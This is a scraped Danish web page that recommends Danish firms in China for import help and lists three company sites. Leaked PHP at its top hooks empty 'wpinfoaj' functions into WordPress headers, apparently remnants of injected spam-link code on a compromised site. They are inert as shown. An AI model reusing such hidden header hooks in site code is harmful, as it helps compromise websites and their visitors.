add_action("wp_head", "wpinfoaj2"); function wpinfoaj2(){ echo ""; } add_action("wp_head", "wpinfoaj5"); function wpinfoaj5(){ echo ""; } add_action("wp_head", "wpinfoaj6"); function wpinfoaj6(){ echo ""; }add_action("wp_head", "wpinfoaj1"); function wpinfoaj1(){ echo ""; }

Danske virksomheder i Kina, som kan hjælpe med din Kina import | Kina Import Guiden
Kina Import Guiden - Kina Import Guiden – om at importere fra Kina, handel med Kina og produktion i Kina. Læs her inden du starter en kina butik eller webshop med kina varer.

Danske virksomheder i Kina, som kan hjælpe med din Kina import

Der findes mange både danske virksomheder i Kina og Internationelle virksomheder, som kan hjælpe med Kina import. Virksomhederne har ofte kontor både i Danmark og i Kina, så du kan ringe til deres danske kontor og mødes med dem i Danmark, og deres kinesiske afdeling, kan så tage sig af det videre arbejde.

Det at du kan snakke med danskere på det danske kontor, gør kommunikationen nemmere og færre fejl riskierer at opstå, i forhold til hvis du skulle snakke direkte med fabrikken om produktionen i Kina pr. email ved hjælp af translate.google.com

Og det koster jo ikke noget at forhøre sig, så kontakt gerne flere af de danske virksomheder i Kina og få en snak og et tilbud fra dem, så du kan sammenligne og finde det bedste tilbud til dig og din ide.

De danske virksomheder i Kina kan også give dig en del information ved første samtale, ting som du ikke havde tænkt på eller regler og love du ikke kendte til.

Her er de første danske virksomheder i Kina, som du kan kontakte for mere information:

http://www.imexed.dk
http://www.chinaoutsourcing.dk
http://www.global-industries.com